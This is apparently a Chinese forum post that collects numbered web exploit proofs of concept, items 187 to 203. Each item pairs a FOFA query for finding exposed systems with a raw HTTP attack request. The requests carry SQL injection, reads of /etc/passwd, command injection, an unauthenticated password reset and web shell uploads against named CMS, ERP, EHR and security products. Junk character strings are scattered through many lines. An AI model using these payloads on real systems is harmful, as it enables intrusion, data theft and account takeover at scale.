2 A# w5 v- j! S* z& q( SPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
. m! |) S: N+ t" Y' S/ THost: your-ip# w. L% Z" [) O6 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.09 a2 w% o2 w G. h* f) j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.87 `6 l8 L7 J: E2 q: j7 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ K5 M* D* h( t8 y3 s
Accept-Encoding: gzip, deflate/ u6 @5 W2 ? H, c; A
Connection: close
, I7 U% T t8 T7 P- B% y; m. XContent-Type: application/x-www-form-urlencoded' l$ C# K b1 p' c( u% e
# _" @1 S' n+ f4 \0 a
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14503 m, _8 b# c. B
h" K3 n1 B% G0 c) ]+ z; q- j) y$ {0 E! h
187. Mura CMS processAsyncObject SQL注入& f* E. q/ D9 d: |' [5 ]8 f+ @, ~9 `
CVE-2024-32640
4 C V- \/ |6 F# F' @4 j3 jFOFA:"Mura CMS"
5 y5 P K/ @- `9 ~! U UPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1# z0 J. a- A( g/ M; e& F
Host: your-ip
7 M! B. f/ O. c/ P' A8 ?Content-Type: application/x-www-form-urlencoded4 [2 a+ X) G6 F3 L. T
$ J7 m1 w' p: l& k
: [8 j5 d5 G. Lobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
& v) r5 b& y( L9 u
4 c( ^) J2 h) y2 N" ]+ r
& S4 Y& l9 W# w9 n* M- O7 t188. 叁体-佳会视频会议 attachment 任意文件读取4 ^1 X! \: k3 k; k; L
version <= 3.9.7. t2 P( J6 n z1 E: @ H
FOFA:body="/system/get_rtc_user_defined_info?site_id"
7 f% D% O& }( k- ?$ n! uGET /attachment?file=/etc/passwd HTTP/1.1* ^8 r! B- q! ?1 }
Host: your-ip; Z( Z7 l0 W+ E; U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 a* I3 Y# }5 T& i+ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# ^! ?3 H2 P3 j) R1 ~Accept-Encoding: gzip, deflate
+ Q: Z# ~3 h/ O/ e2 ZAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
: L# Q# W v/ u. t- p& vConnection: close
" [3 O. F; h. M; Z# f1 k8 G* O Q7 H" q9 n
7 M' D v0 ~- A7 `
189. 蓝网科技临床浏览系统 deleteStudy SQL注入" ]2 J4 U% X, J+ m4 r8 f
FOFA:app="LANWON-临床浏览系统"
6 E% Z) H# h5 H: o; lGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
2 ]7 v) S* Z/ t! S) i4 kHost: your-ip
9 \; S H+ R# w# V& QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 K: x; M5 @* \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; [' u+ G: E m5 ?2 L; Y
Accept-Encoding: gzip, deflate
4 e6 S2 z5 X$ X HAccept-Language: zh-CN,zh;q=0.9% k) u, w7 A- v
Connection: close
) B% ~) Y) f# F1 |7 v/ U, y4 b1 l! T4 Z( |9 ]
$ G% a6 o0 u9 ^
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
: J, D# D$ h+ T9 VFOFA:title=="短视频矩阵营销系统"
+ B' A2 S5 s! OPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
0 l4 [( [3 H' X) i0 @+ z z0 ]$ xHost: your-ip
* m! r) Q) N$ }# ?0 w* ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
! B. Y' Y; M4 P$ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: h5 G2 s4 O9 x) N" w1 q
Content-Type: application/x-www-form-urlencoded
% i7 t Z! |: R$ J1 C1 EAccept-Encoding: gzip, deflate
( W9 k! \' v% }$ R. {3 dAccept-Language: zh-CN,zh;q=0.9" d! d' S: _7 k; D8 `% a
9 H$ ~, F# k U3 X- o
poi=file:///etc/passwd2 J. l8 ^3 R8 x. d2 f) }0 ]
+ Z+ T# b( K" L; g
' X* f/ z9 k7 L4 P" L% z5 l( {191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入9 }( d) |# n- o( C0 S2 G
FOFA:body="/CDGServer3/index.jsp"
) _" W `7 g- JPOST /CDGServer3/js/../NavigationAjax HTTP/1.17 P, ~* v1 T, g* d _7 D. [# _
Host: your-ip' v1 o+ H# n" k \" j) U7 p" B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& o; S% Q; m" E. KContent-Type: application/x-www-form-urlencoded
+ y6 i$ M+ n0 X# d& I1 E- }' l: s' E& N9 Q6 c7 t. \% F
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=0 w$ {; ^, B- V( c/ b6 Q: d; u% p
7 A3 m7 _7 B. e7 O* p# C( d5 x# v* M2 n& c! U+ ^" `8 Y6 F
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
6 C# l d$ r" S' `9 F6 N' `& B) {FOFA:title="用户登录_富通天下外贸ERP" u) m3 `9 D! z/ U; L# R3 Y" A
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
6 d/ e& ]: n1 |! Z" ~% y; X+ gHost: your-ip
i- D! s+ C* t( m/ [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
, Q0 Z8 @9 p: gContent-Type: application/x-www-form-urlencoded
" Z: l7 i6 ?4 Z: X' o
0 O5 G; N' v X/ H2 Z
' k/ i( s+ c0 |- i8 L$ ]<% @ webhandler language="C#" class="AverageHandler" %> V7 S, f: @# W" M
using System;* d; c" h# J+ C3 Z' u) a% M
using System.Web;
p" N" b4 c, z6 u3 ppublic class AverageHandler : IHttpHandler
) Z/ ^# O, a" N! B! ]% {" W{
# U: F3 I" F! Y/ ~public bool IsReusable8 c# o _8 P5 q( M- N1 t
{ get { return true; } }2 _2 E& g0 ?: @" ~$ ]4 g
public void ProcessRequest(HttpContext ctx)1 S5 h4 y& e" v' A' |
{
# g% q. m1 J; g' D) R/ xctx.Response.Write("test");0 w5 n6 X1 w1 ~# s; B2 T
}0 o6 g! V+ E: a
}
9 ]+ M) E `7 F4 _* D* ^, e
* M0 U/ @& B! @7 c) K. V* P: K4 B8 K1 S3 B
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行) u+ c9 w+ [6 K1 r; B- k0 ^
FOFA:body="山石云鉴主机安全管理系统"& N' F2 o# {9 K# v# U$ Z1 B
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
3 L3 y8 S" G6 @& j9 k- \! VHost:" V! P0 t1 _5 v5 l
Cookie: PHPSESSID=2333333333333;8 a- ]7 S% ~" y" s
Content-Type: application/x-www-form-urlencoded
. f: p `8 G+ Y3 e. TUser-Agent: Mozilla/5.0
& a# Q1 K) @6 Y0 v8 x- L; x
7 U. Y1 q# Q1 @1 v( h* `1 f' T* x9 ~0 a. j: `! ? t+ X# z
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
5 m; f! d5 K6 n; M1 r* LHost:
2 S2 g% }; n. w7 m2 N+ g3 {: XUser-Agent: Mozilla/5.0
. m: J; F& M, r. ?( KAccept-Encoding: gzip, deflate
1 w" ], N6 g# aAccept: */*( _" a& _7 ?. Y) U; ?6 e8 N
Connection: close
8 o9 P9 h3 ^. b( n1 m% c9 ]9 nCookie: PHPSESSID=2333333333333; v& F! P0 R$ X8 r. M" t' S" \( `0 K
Content-Type: application/x-www-form-urlencoded
5 T" N+ v( E, l' }, j1 mContent-Length: 84
1 A: g, i# P5 {* u# H) g. L7 f( ~% B5 s: j5 G' E4 g, G
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
8 K$ g8 \+ y1 d: n/ I
! X' e. T5 C+ u. I s. ?4 ~
- u3 D% t0 ~0 t0 c: P: O. iGET /master/img/config HTTP/1.19 l$ u/ W, n! j- R: O5 R0 w
Host:
7 K% X/ ]) U: t, Y, eUser-Agent: Mozilla/5.06 L& N& x0 t: b% E' `
5 r: K4 | C9 W
0 K4 }! @" N7 r- N* E& n194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
7 I5 m2 y' `+ ^% E# VFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
- E7 |/ L+ i% I8 T3 B% k6 t, m% S! }+ j* H
POST /servlet/uploadAttachmentServlet HTTP/1.14 [9 O) j0 L0 I- J5 u$ E
Host: host
7 r# i, k. y6 D: Z8 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36- a7 C0 _* {, m P/ e9 D+ ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 y. z: f/ x) D cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 m+ E* L, `/ c, A) v2 ~, J4 Q4 q+ }
Accept-Encoding: gzip, deflate
8 V& q- V! u2 |9 nConnection: close
: W6 ]" s% s' \$ E6 }- ]# mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk0 c! U# e0 m) A! p
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
$ a5 r+ B! {0 \' K, D$ @ v; _" w3 ?- b4 A$ {
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"$ s! w, F+ p5 `
Content-Type: text/plain
; t9 ~. @/ P% e5 G<% out.println("hello");%>5 N0 ?: |1 x0 J% N! M$ N7 ~
------WebKitFormBoundaryKNt0t4vBe8cX9rZk4 _# ~* i' X0 f% q B
Content-Disposition: form-data; name="json"
6 s' p- A3 T3 u2 b$ F: ^ {"iq":{"query":{"UpdateType":"mail"}}}9 |' ~5 M9 ?2 \. ~* ?/ C
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--- t5 v& X6 |" t$ W$ n6 H- x3 z d' d
+ \- W3 I6 q/ v7 Q4 o
8 j2 r6 O0 l7 c" D. x9 g; p195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
: D/ K0 S+ I# y* Z. H% _FOFA:title=="飞鱼星企业级智能上网行为管理系统 l1 {; Z: E, s! d- H! Y$ f
POST /send_order.cgi?parameter=operation HTTP/1.12 \3 e% q" k" W2 M
Host: 127.0.0.1
- P6 I/ p F6 O0 o! RPragma: no-cache6 p/ {2 y- | b' ~1 M+ @. q
Cache-Control: no-cache
4 E Z( b8 r1 L9 N4 ?% h6 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% J0 h. h* e* I" H& r) kAccept: */*
# L* I N- ]/ I- e, j! Q; S4 oAccept-Encoding: gzip, deflate6 O# ^; y" Q$ b
Accept-Language: zh-CN,zh;q=0.9
3 y. E+ `2 a3 R1 {Connection: close# F8 s- ^' j( y
Content-Type: application/x-www-form-urlencoded
3 C' A* I# i9 AContent-Length: 68: I' x) ]( z1 b
: O7 d1 |$ u k8 K7 R( w- G3 R5 ?{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
* _ U$ O$ G9 l. _, g7 b/ S% I( Y0 g, P8 G
2 }# F- z _+ {: d1 H1 ?
196. 河南省风速科技统一认证平台密码重置
, T: L1 b8 t' G* T* |' q3 D! kFOFA:body="/cas/themes/zbvc/js/jquery.min.js"# r- A+ h5 F# R% ~! z# a
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
7 A I+ f2 B2 y M$ k b5 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
* X, c' d5 }' S5 r: M3 c3 z& QContent-Type: application/json;charset=UTF-8
% I$ Z" c9 B+ E- |' i: _, N8 u( I# bX-Requested-With: XMLHttpRequest S8 `1 ?; |6 v5 A0 m0 u2 e
Host:
# D- s5 {2 c2 y5 jAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2" z# L; M0 z" {' \ o8 X0 y
Content-Length: 45& q* l @& W6 a
Connection: close
6 m- d& P7 S: ` _/ \
D- B1 I Z0 A* |- {{"xgh":"test","newPass":"test666","email":""}
3 H6 Z* F: W: v% O
7 u$ W% p7 {2 a* j- R' U
# L# {: G; I8 W# ]
% ^% p0 S1 _) F' e( x197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入8 V# A! c8 Z- x
FOFA:app="浙大恩特客户资源管理系统"
7 v6 N( D( h) g+ R8 OGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
: n( `1 M4 I" ` T( o/ eHost:
/ q' s: Z- g: T" q* cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
2 c( j f x9 h1 r* e2 }$ m. A! ?2 N8 ^Accept-Encoding: gzip, deflate
* v T# Q& g: H, f" h7 FConnection: close: @7 i9 l" I" r, l
+ t+ T c# b4 Z5 o" p2 R( @/ u% K1 F! H+ S# L
4 P( p' G, M2 z; p& s6 t198. 阿里云盘 WebDAV 命令注入
) y( U+ k' C6 y$ m1 RCVE-2024-296401 W* l2 c6 o5 x3 N
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
' r a e" c' }, O, L$ HCookie: sysauth=41273cb2cffef0bb5d0653592624cf642 P) V- q/ P# N! J
Accept: */*
" ]! p4 a v5 Z kAccept-Encoding: gzip, deflate
# S; E6 ~2 q' k+ {3 a" z! oAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
) D- n( _2 e! MConnection: close$ Y0 R8 g1 ]5 L/ e
9 ]& N6 b, V: f- _2 m9 w% I, `! A T+ [, t! H
199. cockpit系统assetsmanager_upload接口 文件上传
8 z' }/ u8 y: M' w$ G
3 \1 P- a/ _6 u" k8 W1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
) \/ c" ], N# p3 v. ]% AGET /auth/login?to=/ HTTP/1.1
' x5 z6 {7 z0 k/ U/ e! C& U# O: d: R5 t) I# k& k8 _
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"+ G+ ^. }" @9 G
* H6 ?& `/ }0 W
2.使用刚才上一步获取到的jwt获取cookie:
b8 [! V$ C* z) L8 U) D% D1 F6 ~; u+ ^
POST /auth/check HTTP/1.1
: f5 O6 L' n! N5 iContent-Type: application/json
# j% \* L# r+ s' m6 |4 Q, B
& \9 F/ e' \& {0 W# T* e{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
# q! y8 R, f( e7 V: Z) p
* G1 P! Z0 f# X/ G) s响应:200,返回值:
* t3 [2 w: F1 XSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
0 o+ z K) X8 b7 Z) RFofa:title="Authenticate Please!"4 h4 I$ u. y, d2 Q* |' k
POST /assetsmanager/upload HTTP/1.1
- P. [% A% J- Y2 Z( KContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3% g3 M7 q+ a2 Z" N, F1 {5 \6 @( L6 x
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92/ v. S/ k5 h$ A* k4 B* D
9 e, B, ^+ X9 F- j-----------------------------36D28FBc36bd6feE7Fb3
: q5 E. e7 y& c5 MContent-Disposition: form-data; name="files[]"; filename="tttt.php"
. Q% P% X x3 ]; I$ @Content-Type: text/php
5 I6 H+ D( G0 t6 E4 [9 ]- I$ k& Y0 ?% N1 R" ^, B1 E8 g
<?php echo "tttt";unlink(__FILE__);?>
9 h1 Y3 i/ G- S* z8 X* b-----------------------------36D28FBc36bd6feE7Fb3. c8 |8 O/ u* C4 {/ h" N2 o
Content-Disposition: form-data; name="folder"
6 b# X9 K( V5 [! L+ O/ x; q
3 @/ C* R% P1 }8 ]! [: T! l1 ^: Q-----------------------------36D28FBc36bd6feE7Fb3--) a6 l0 `4 I% B6 g" O6 d' p+ C! w
) @' V4 C' Y5 r& {
' ` ` ~2 M' Q/ K% j9 v ^4 S# ~0 c2 Y
/storage/uploads/tttt.php
; C8 T; t9 Q0 W9 n; g7 n
/ q1 A0 n5 W. M* n& x200. SeaCMS海洋影视管理系统dmku SQL注入 s" X3 V7 N) D7 X4 {
FOFA:app="海洋CMS"* l* B9 [: j: U
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.18 K S0 g5 P# x8 x) [+ R% o! D7 G
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
2 O7 l/ w( c7 z# J) k; tUpgrade-Insecure-Requests: 16 u: Y" `( x( O
Cache-Control: max-age=07 y. P+ n/ B; u" n) |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 e) i8 o0 X7 y- @& O3 fAccept-Encoding: gzip, deflate, F3 I" [5 `& [& T/ a. @" W
Accept-Language: zh-CN,zh;q=0.9
9 K5 b) v$ b" g
6 x6 D+ y& @! a+ {4 k& x" d# e* G: O! g5 V! V5 R/ O
201. 方正全媒体新闻采编系统 binary SQL注入
' ^" I* ?: E% C5 G- U' i5 LFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
0 c1 z \1 X) D/ | L2 r+ CPOST /newsedit/newsplan/task/binary.do HTTP/1.1
a2 F7 e0 s6 i& ^( n8 QContent-Type: application/x-www-form-urlencoded
- T$ T6 Q3 b( Y( A% f* S3 y; FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 O- ~- ^1 Y+ Y' h4 iAccept-Encoding: gzip, deflate, M! ]! s+ G- y) ?5 u
Accept-Language: zh-CN,zh;q=0.9
9 J8 A6 F4 M' Y% ^# U) fConnection: close3 X) ?, |& W. o4 N7 G! N
9 N3 s s! u5 b. v! M* {4 T9 z8 K# oTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=16 o( A; v7 V) W1 F! [" W- I- y" S
% W6 l! a& `3 r$ u
/ n0 p5 l2 v& x
202. 微擎系统 AccountEdit任意文件上传& H- k$ n; T& [: Z7 J
FOFA:body="/Widgets/WidgetCollection/": |3 s0 `2 A6 d3 b+ x+ S) n8 {
获取__VIEWSTATE和__EVENTVALIDATION值, m: X) Q1 M% y( |
GET /User/AccountEdit.aspx HTTP/1.1
( K3 ?1 E8 k4 T" D8 y7 C+ X9 bHost: 滑板人之家
2 c- E& U" n" k I0 t; tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
8 t# E( M9 ]- OContent-Length: 0, h* ~. {! m; m! k. J3 [
, X5 m1 C! V* Q& h; p5 ~
: _ @6 S$ P! X L: i/ n0 d3 U* I替换__VIEWSTATE和__EVENTVALIDATION值
& X. s' _! _$ c% s9 }POST /User/AccountEdit.aspx HTTP/1.17 j" i9 F; I; ^
Accept-Encoding: gzip, deflate, br
( S0 l9 D4 d. s$ [" PContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687 _, G. X# Z1 C3 D. \" A) e% p+ q
, W: C8 p$ P2 H, V) G. b J-----------------------------786435874t38587593865736587346567358735687; V# r6 r/ |4 l* N8 u
Content-Disposition: form-data; name="__VIEWSTATE"
% m# A: t, |* E/ u" q+ u) J6 r
9 Y. @ i0 R6 R: x) ?__VIEWSTATE
3 A/ [2 q, A I# C0 O' D# |: J-----------------------------786435874t38587593865736587346567358735687$ d5 T- J. w* H$ S: c
Content-Disposition: form-data; name="__EVENTVALIDATION"/ l. Z! x6 e& `" P L1 T# x
' V0 n7 \7 t3 h0 N i
__EVENTVALIDATION
* ?* N; `, A7 I e5 C% u5 k6 G- J-----------------------------786435874t38587593865736587346567358735687& x9 r5 t" } O# ]- M, ~4 J0 R
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt" `+ t' P3 ^7 d
Content-Type: text/plain
) ^. b& _" D- k8 D& M
' c9 ]6 h" P1 {- e' }' qHello World!
z4 Z* c1 g) B4 \-----------------------------786435874t38587593865736587346567358735687( @/ p2 `# d5 t! T
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"( x, T* k' {- \
% t- Q, o; W, G- H% h3 L上传图片" p3 K& ]4 P; V! y( l
-----------------------------786435874t385875938657365873465673587356874 u# L; D' t* K" _
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
' a. z3 S* d6 X7 W6 v1 x! |) Y# C
8 q3 r0 H( ~, U$ o: V# {) b-----------------------------786435874t385875938657365873465673587356873 Y; h7 h# q+ ?5 R2 {9 D. n
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
2 c2 H9 j5 Y7 q6 A, ?! b7 c
m3 z5 w ?* J* @+ [/ `/ K7 C/ ]& c' G4 ]& S3 b) f% T3 l- b9 M
-----------------------------786435874t38587593865736587346567358735687--$ {0 P" y; K- i" `4 M
6 |/ e: r, }% S
" Y! r6 l+ k$ z- j+ k/ Z
/_data/Uploads/1123.txt
4 o/ A9 V4 w E0 j. q/ {) A1 W2 h
o; n* J! d" V, ] c1 c0 K3 d; L203. 红海云EHR PtFjk 文件上传
4 z! U3 i5 L# e5 bFOFA:body="RedseaPlatform"! ^3 K6 e! f X s" J
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
/ q4 J( X: [5 x8 O4 N% C5 y' dHost: x.x.x.x
) h7 a7 W/ A. _" ~Accept-Encoding: gzip- W- {8 D+ d/ u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 z8 ~% B; T; ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys43 ^( o7 s x* X8 }' I
Content-Length: 2101 i' R/ w3 r7 _% X G
# F+ p% R) h+ |6 k0 h& V$ m! D$ j------WebKitFormBoundaryt7WbDl1tXogoZys4
; \; z9 C) q3 _% \5 ~' ^Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
, |1 Q$ F" E- \; f" X% oContent-Type:image/jpeg
0 h# u* }, c: J6 B8 J+ y& n
t' ~! B9 F8 a<% out.print("hello,eHR");%>
, a/ O) p' v3 A: J% u% p7 ~2 @------WebKitFormBoundaryt7WbDl1tXogoZys4--
, e" T. G" N( f' o* z- y5 o9 G7 B
% ]$ f- t' J& J! ^ 3 e3 V7 U& B& Q9 f9 p
. w% P3 k" |! Z* |, i: O
" j2 a6 Z/ p6 h, q
" t! ~/ g: |, C$ X8 V6 R R
5 Y, E$ k; d9 \( \$ N% `9 F
|
发表于 2024-6-5 14:31:29
收藏
支持
反对